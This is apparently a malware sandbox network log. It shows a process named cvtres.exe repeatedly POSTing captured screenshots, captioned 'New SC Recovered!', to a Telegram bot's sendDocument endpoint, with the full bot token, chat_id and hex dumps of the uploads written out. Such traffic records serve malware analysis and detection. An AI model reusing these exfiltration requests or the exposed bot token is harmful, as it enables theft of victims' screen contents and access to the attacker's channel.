                                                        2024-10-30 15:25:22 UTC10923OUTData Raw: 5e b6 17 f8 31 fe ba 9f 37 98 7f bc cb e5 f9 21 28 a5 a4 ae 93 88 5a a0 97 3f 63 d7 a2 b9 cf 11 48 8c 7e 9c 67 f4 ab f5 4a e6 cb cd 95 a5 f3 31 9e d8 a8 95 ac ee 75 61 26 a1 52 ec ea 2f 75 5b 1b 5d 7f 4d 8e de e6 17 b6 2f 2b cc ca e0 ae 64 27 a9 e9 c5 60 78 b2 e2 de 4d 42 0b 6b 39 16 4b 6b 58 16 24 64 60 c0 fe 23 f0 fc ab 5f fe 10 2f fa 89 ff 00 e4 0f fe ca 94 78 08 64 67 53 24 77 c4 1f fd 95 70 42 a5 08 34 f9 b6 3d f9 46 ac 95 ac 6f 5e 9b d1 74 fe 4a ea 45 38 c7 93 f6 6d 9d 3b 6f f9 bf 3a 93 4e 37 66 76 f3 d6 fc 2e de 3e d1 e4 6d ce 47 fc f3 e7 3f a5 68 d1 5e 7f 3e 96 b1 d7 cb ad cf 36 5f ba 3e 94 b4 8b f7 47 d2 96 bd f8 7c 28 f8 ea 9f 1b f5 0a 28 a2 ac 80 ae 93 c1 7f f2 0d ba ff 00 af a7 fe 4b 5c dd 74 9e 0b ff 00 90 6d d7 fd 7d 3f f2 5a f2 f3 1f b1 f3
                                                        Data Ascii: ^17!(Z?cH~gJ1ua&R/u[]M/+d'`xMBk9KkX$d`#_/xdgS$wpB4=Fo^tJE8m;o:N7fv.>mG?h^>6_>G|((K\tm}?Z
                                                        2024-10-30 15:25:22 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 35 65 31 33 32 62 37 63 35 34 2d 2d 0d 0a
                                                        Data Ascii: -----------------------------8dd205e132b7c54--
                                                        2024-10-30 15:25:23 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:25:23 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.450011149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:25:22 UTC262OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dd2220eb6172f8
                                                        Host: api.telegram.org
                                                        Content-Length: 76837
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        2024-10-30 15:25:23 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:25:23 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 32 30 65 62 36 31 37 32 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 32 30 65 62 36 31 37 32 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 32 32 2f 32 30 32 34 20 30 30 3a 32 38 3a 30 36 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dd2220eb6172f8Content-Disposition: form-data; name="chat_id"7102900518-----------------------------8dd2220eb6172f8Content-Disposition: form-data; name="caption"New SC Recovered!Time: 12/22/2024 00:28:06User
                                                        2024-10-30 15:25:23 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                        Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|
                                                        2024-10-30 15:25:23 UTC16355OUTData Raw: 31 8a 95 2e 66 b5 4c cb a2 8a 2b d7 3c 10 a4 a5 a2 80 2e 68 df f2 18 b4 ff 00 ae 82 bd 02 bc ff 00 47 ff 00 90 bd a7 fd 75 5f e7 5d 46 af 7f 73 f6 a8 b4 cd 3f 02 ee 61 b9 a4 3d 22 4f 5a f2 71 b1 73 ac 92 ed fe 67 bb 97 4d 42 83 6f bf e8 8d 8a ab 7a db 04 2e 55 99 56 4e 76 a9 6f e1 61 d0 7d 6b 24 f8 6f 4d 00 35 fc f2 5c 4c dd 64 96 52 32 7d a9 92 cb 67 e1 82 c0 5c 5c cf e6 0c a5 b1 6d c1 40 ea 7d ab 97 d9 46 5a 41 dd fa 1d fe d6 51 d6 6a cb d4 cb d6 ec e1 8d fe d1 6e ae 88 c7 95 68 d9 40 3e d9 15 93 5d 6f 89 66 8e e3 42 86 68 9b 72 49 22 b2 9f 62 0d 72 55 ea 60 a5 29 53 b4 ba 3b 1e 1e 63 08 c6 b5 e3 d5 5c 29 05 2d 15 d8 70 09 45 2d 25 00 14 51 45 00 14 94 b4 50 01 49 4b 45 03 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 96 92 98 05 14 51 40 05 25 2d 25 03 0a
                                                        Data Ascii: 1.fL+<.hGu_]Fs?a="OZqsgMBoz.UVNvoa}k$oM5\LdR2}g\\m@}FZAQjnh@>]ofBhrI"brU`)S;c\)-pE-%QEPIKE(((Q@%-%
                                                        2024-10-30 15:25:23 UTC16355OUTData Raw: 61 54 b1 fd 05 15 0c ac b1 cd 14 92 12 b1 e1 d1 d8 2e ed a1 d0 ae 71 df 19 cd 3a ae 51 83 71 dc 54 23 19 54 8c 67 b1 25 a3 7d b1 ad d6 26 8c 19 dd e3 5d cc 47 2a bb 8e 78 f4 a7 5b 86 b8 f3 42 6d 53 0c 6f 23 ef 38 da 17 af e3 59 11 49 15 98 b3 b7 59 d6 75 41 72 f2 4b 1a 3e d0 cf 16 c5 51 90 0f 6e 78 ef 4b 1e a4 37 43 23 09 11 e7 8a 57 bc 25 49 1e 67 94 c8 a0 63 d4 92 c7 fd ef 6a f3 a5 8a aa af 65 d3 43 d8 8e 02 83 e5 bc bd 75 34 e5 6f 26 3b 79 1c ae db 88 56 64 da 73 90 46 71 f5 e4 7e 75 25 c2 2d ac d7 11 dd 5c db c1 f6 7f 2f 7b 33 31 19 70 4a 8f 95 4f a1 ac 74 d4 51 63 4f 96 47 36 d6 d0 bd b6 14 e3 cf 58 c2 32 9c f6 c8 53 e9 f2 7b d3 e2 bc 0f 0c e8 97 56 f0 ce d1 59 8d d7 76 c6 55 26 34 21 f8 d8 dc 82 47 38 fa 1a 1e 2a af 44 54 70 18 7b b6 df e2 6a 0d 8a
                                                        Data Ascii: aT.q:QqT#Tg%}&]G*x[BmSo#8YIYuArK>QnxK7C#W%IgcjeCu4o&;yVdsFq~u%-\/{31pJOtQcOG6X2S{VYvU&4!G8*DTp{j
                                                        2024-10-30 15:25:23 UTC15447OUTData Raw: 14 00 51 45 14 0c 29 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 94 b4 94 0c 28 a2 8a 60 14 94 b4 94 00 51 45 14 0c 29 29 68 a4 02 51 45 14 c6 14 51 45 00 25 14 51 40 05 14 51 40 09 45 2e 29 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 30 a2 8a 28 00 a2 92 8a 00 53 49 45 14 0c 28 a3 34 94 00 b4 9c 51 45 31 86 4a f4 24 7d 0d 48 b3 cc bd 24 6f ce a2 a3 34 5a e0 59 17 b3 8e a5 4f d4 54 82 ff 00 fb f0 21 aa 24 d1 9a 39 10 58 d1 5b bb 63 f7 a2 71 f4 35 22 cb 66 df f2 d9 97 fd e5 ac 9d e0 53 4c 9e 82 93 a6 bb 87 25 cd d5 8e 27 ff 00 57 73 19 fc 6a c4 36 ed 10 91 8b 29 1e 59 e4 1a e5 d9 cd 20 96 45 ce 1d 87 d0 d6 72 a6 de 97 0f 64 df 51 1b a9 e9 4d fa d2 e7 34 95 a9 ba 42 50 68 fc 69 28 28 4a 3f 2a 3a 51 40 c3 f1 a4 e9 4b 49 f4 a4 01 f5 a3 34 52 50 30 fc a9 28 a2 81 87
                                                        Data Ascii: QE)(JZJQE(`QE))hQEQE%Q@Q@E.)(QERPEP0(SIE(4QE1J$}H$o4ZYOT!$9X[cq5"fSL%'Wsj6)Y ErdQM4BPhi((J?*:Q@KI4RP0(
                                                        2024-10-30 15:25:23 UTC11251OUTData Raw: 5e b6 17 f8 31 fe ba 9f 37 98 7f bc cb e5 f9 21 28 a5 a4 ae 93 88 5a a0 97 3f 63 d7 a2 b9 cf 11 48 8c 7e 9c 67 f4 ab f5 4a e6 cb cd 95 a5 f3 31 9e d8 a8 95 ac ee 75 61 26 a1 52 ec ea 2f 75 5b 1b 5d 7f 4d 8e de e6 17 b6 2f 2b cc ca e0 ae 64 27 a9 e9 c5 60 78 b2 e2 de 4d 42 0b 6b 39 16 4b 6b 58 16 24 64 60 c0 fe 23 f0 fc ab 5f fe 10 2f fa 89 ff 00 e4 0f fe ca 94 78 08 64 67 53 24 77 c4 1f fd 95 70 42 a5 08 34 f9 b6 3d f9 46 ac 95 ac 6f 5e 9b d1 74 fe 4a ea 45 38 c7 93 f6 6d 9d 3b 6f f9 bf 3a 93 4e 37 66 76 f3 d6 fc 2e de 3e d1 e4 6d ce 47 fc f3 e7 3f a5 68 d1 5e 7f 3e 96 b1 d7 cb ad cf 36 5f ba 3e 94 b4 8b f7 47 d2 96 bd f8 7c 28 f8 ea 9f 1b f5 0a 28 a2 ac 80 ae 93 c1 7f f2 0d ba ff 00 af a7 fe 4b 5c dd 74 9e 0b ff 00 90 6d d7 fd 7d 3f f2 5a f2 f3 1f b1 f3
                                                        Data Ascii: ^17!(Z?cH~gJ1ua&R/u[]M/+d'`xMBk9KkX$d`#_/xdgS$wpB4=Fo^tJE8m;o:N7fv.>mG?h^>6_>G|((K\tm}?Z
                                                        2024-10-30 15:25:23 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 32 30 65 62 36 31 37 32 66 38 2d 2d 0d 0a
                                                        Data Ascii: -----------------------------8dd2220eb6172f8--
                                                        2024-10-30 15:25:23 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:25:23 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.450013149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:25:37 UTC262OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dd2e705f847556
                                                        Host: api.telegram.org
                                                        Content-Length: 76460
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        2024-10-30 15:25:38 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:25:38 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 65 37 30 35 66 38 34 37 35 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 65 37 30 35 66 38 34 37 35 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 30 36 2f 32 30 32 35 20 31 36 3a 32 37 3a 30 35 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dd2e705f847556Content-Disposition: form-data; name="chat_id"7102900518-----------------------------8dd2e705f847556Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/06/2025 16:27:05User
                                                        2024-10-30 15:25:38 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                        Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|
                                                        2024-10-30 15:25:38 UTC16355OUTData Raw: 31 8a 95 2e 66 b5 4c cb a2 8a 2b d7 3c 10 a4 a5 a2 80 2e 68 df f2 18 b4 ff 00 ae 82 bd 02 bc ff 00 47 ff 00 90 bd a7 fd 75 5f e7 5d 46 af 7f 73 f6 a8 b4 cd 3f 02 ee 61 b9 a4 3d 22 4f 5a f2 71 b1 73 ac 92 ed fe 67 bb 97 4d 42 83 6f bf e8 8d 8a ab 7a db 04 2e 55 99 56 4e 76 a9 6f e1 61 d0 7d 6b 24 f8 6f 4d 00 35 fc f2 5c 4c dd 64 96 52 32 7d a9 92 cb 67 e1 82 c0 5c 5c cf e6 0c a5 b1 6d c1 40 ea 7d ab 97 d9 46 5a 41 dd fa 1d fe d6 51 d6 6a cb d4 cb d6 ec e1 8d fe d1 6e ae 88 c7 95 68 d9 40 3e d9 15 93 5d 6f 89 66 8e e3 42 86 68 9b 72 49 22 b2 9f 62 0d 72 55 ea 60 a5 29 53 b4 ba 3b 1e 1e 63 08 c6 b5 e3 d5 5c 29 05 2d 15 d8 70 09 45 2d 25 00 14 51 45 00 14 94 b4 50 01 49 4b 45 03 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 96 92 98 05 14 51 40 05 25 2d 25 03 0a
                                                        Data Ascii: 1.fL+<.hGu_]Fs?a="OZqsgMBoz.UVNvoa}k$oM5\LdR2}g\\m@}FZAQjnh@>]ofBhrI"brU`)S;c\)-pE-%QEPIKE(((Q@%-%
                                                        2024-10-30 15:25:38 UTC16355OUTData Raw: 61 54 b1 fd 05 15 0c ac b1 cd 14 92 12 b1 e1 d1 d8 2e ed a1 d0 ae 71 df 19 cd 3a ae 51 83 71 dc 54 23 19 54 8c 67 b1 25 a3 7d b1 ad d6 26 8c 19 dd e3 5d cc 47 2a bb 8e 78 f4 a7 5b 86 b8 f3 42 6d 53 0c 6f 23 ef 38 da 17 af e3 59 11 49 15 98 b3 b7 59 d6 75 41 72 f2 4b 1a 3e d0 cf 16 c5 51 90 0f 6e 78 ef 4b 1e a4 37 43 23 09 11 e7 8a 57 bc 25 49 1e 67 94 c8 a0 63 d4 92 c7 fd ef 6a f3 a5 8a aa af 65 d3 43 d8 8e 02 83 e5 bc bd 75 34 e5 6f 26 3b 79 1c ae db 88 56 64 da 73 90 46 71 f5 e4 7e 75 25 c2 2d ac d7 11 dd 5c db c1 f6 7f 2f 7b 33 31 19 70 4a 8f 95 4f a1 ac 74 d4 51 63 4f 96 47 36 d6 d0 bd b6 14 e3 cf 58 c2 32 9c f6 c8 53 e9 f2 7b d3 e2 bc 0f 0c e8 97 56 f0 ce d1 59 8d d7 76 c6 55 26 34 21 f8 d8 dc 82 47 38 fa 1a 1e 2a af 44 54 70 18 7b b6 df e2 6a 0d 8a
                                                        Data Ascii: aT.q:QqT#Tg%}&]G*x[BmSo#8YIYuArK>QnxK7C#W%IgcjeCu4o&;yVdsFq~u%-\/{31pJOtQcOG6X2S{VYvU&4!G8*DTp{j
                                                        2024-10-30 15:25:38 UTC15447OUTData Raw: 14 00 51 45 14 0c 29 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 94 b4 94 0c 28 a2 8a 60 14 94 b4 94 00 51 45 14 0c 29 29 68 a4 02 51 45 14 c6 14 51 45 00 25 14 51 40 05 14 51 40 09 45 2e 29 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 30 a2 8a 28 00 a2 92 8a 00 53 49 45 14 0c 28 a3 34 94 00 b4 9c 51 45 31 86 4a f4 24 7d 0d 48 b3 cc bd 24 6f ce a2 a3 34 5a e0 59 17 b3 8e a5 4f d4 54 82 ff 00 fb f0 21 aa 24 d1 9a 39 10 58 d1 5b bb 63 f7 a2 71 f4 35 22 cb 66 df f2 d9 97 fd e5 ac 9d e0 53 4c 9e 82 93 a6 bb 87 25 cd d5 8e 27 ff 00 57 73 19 fc 6a c4 36 ed 10 91 8b 29 1e 59 e4 1a e5 d9 cd 20 96 45 ce 1d 87 d0 d6 72 a6 de 97 0f 64 df 51 1b a9 e9 4d fa d2 e7 34 95 a9 ba 42 50 68 fc 69 28 28 4a 3f 2a 3a 51 40 c3 f1 a4 e9 4b 49 f4 a4 01 f5 a3 34 52 50 30 fc a9 28 a2 81 87
                                                        Data Ascii: QE)(JZJQE(`QE))hQEQE%Q@Q@E.)(QERPEP0(SIE(4QE1J$}H$o4ZYOT!$9X[cq5"fSL%'Wsj6)Y ErdQM4BPhi((J?*:Q@KI4RP0(
                                                        2024-10-30 15:25:38 UTC10874OUTData Raw: 5e b6 17 f8 31 fe ba 9f 37 98 7f bc cb e5 f9 21 28 a5 a4 ae 93 88 5a a0 97 3f 63 d7 a2 b9 cf 11 48 8c 7e 9c 67 f4 ab f5 4a e6 cb cd 95 a5 f3 31 9e d8 a8 95 ac ee 75 61 26 a1 52 ec ea 2f 75 5b 1b 5d 7f 4d 8e de e6 17 b6 2f 2b cc ca e0 ae 64 27 a9 e9 c5 60 78 b2 e2 de 4d 42 0b 6b 39 16 4b 6b 58 16 24 64 60 c0 fe 23 f0 fc ab 5f fe 10 2f fa 89 ff 00 e4 0f fe ca 94 78 08 64 67 53 24 77 c4 1f fd 95 70 42 a5 08 34 f9 b6 3d f9 46 ac 95 ac 6f 5e 9b d1 74 fe 4a ea 45 38 c7 93 f6 6d 9d 3b 6f f9 bf 3a 93 4e 37 66 76 f3 d6 fc 2e de 3e d1 e4 6d ce 47 fc f3 e7 3f a5 68 d1 5e 7f 3e 96 b1 d7 cb ad cf 36 5f ba 3e 94 b4 8b f7 47 d2 96 bd f8 7c 28 f8 ea 9f 1b f5 0a 28 a2 ac 80 ae 93 c1 7f f2 0d ba ff 00 af a7 fe 4b 5c dd 74 9e 0b ff 00 90 6d d7 fd 7d 3f f2 5a f2 f3 1f b1 f3
                                                        Data Ascii: ^17!(Z?cH~gJ1ua&R/u[]M/+d'`xMBk9KkX$d`#_/xdgS$wpB4=Fo^tJE8m;o:N7fv.>mG?h^>6_>G|((K\tm}?Z
                                                        2024-10-30 15:25:38 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 65 37 30 35 66 38 34 37 35 35 36 2d 2d 0d 0a
                                                        Data Ascii: -----------------------------8dd2e705f847556--
                                                        2024-10-30 15:25:38 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:25:38 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.450014149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:25:37 UTC262OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dd302aba920484
                                                        Host: api.telegram.org
                                                        Content-Length: 76460
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        2024-10-30 15:25:38 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:25:38 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 30 32 61 62 61 39 32 30 34 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 30 32 61 62 61 39 32 30 34 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 30 38 2f 32 30 32 35 20 32 31 3a 32 33 3a 33 32 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dd302aba920484Content-Disposition: form-data; name="chat_id"7102900518-----------------------------8dd302aba920484Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/08/2025 21:23:32User
                                                        2024-10-30 15:25:38 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                        Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|
                                                        2024-10-30 15:25:38 UTC16355OUTData Raw: 31 8a 95 2e 66 b5 4c cb a2 8a 2b d7 3c 10 a4 a5 a2 80 2e 68 df f2 18 b4 ff 00 ae 82 bd 02 bc ff 00 47 ff 00 90 bd a7 fd 75 5f e7 5d 46 af 7f 73 f6 a8 b4 cd 3f 02 ee 61 b9 a4 3d 22 4f 5a f2 71 b1 73 ac 92 ed fe 67 bb 97 4d 42 83 6f bf e8 8d 8a ab 7a db 04 2e 55 99 56 4e 76 a9 6f e1 61 d0 7d 6b 24 f8 6f 4d 00 35 fc f2 5c 4c dd 64 96 52 32 7d a9 92 cb 67 e1 82 c0 5c 5c cf e6 0c a5 b1 6d c1 40 ea 7d ab 97 d9 46 5a 41 dd fa 1d fe d6 51 d6 6a cb d4 cb d6 ec e1 8d fe d1 6e ae 88 c7 95 68 d9 40 3e d9 15 93 5d 6f 89 66 8e e3 42 86 68 9b 72 49 22 b2 9f 62 0d 72 55 ea 60 a5 29 53 b4 ba 3b 1e 1e 63 08 c6 b5 e3 d5 5c 29 05 2d 15 d8 70 09 45 2d 25 00 14 51 45 00 14 94 b4 50 01 49 4b 45 03 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 96 92 98 05 14 51 40 05 25 2d 25 03 0a
                                                        Data Ascii: 1.fL+<.hGu_]Fs?a="OZqsgMBoz.UVNvoa}k$oM5\LdR2}g\\m@}FZAQjnh@>]ofBhrI"brU`)S;c\)-pE-%QEPIKE(((Q@%-%
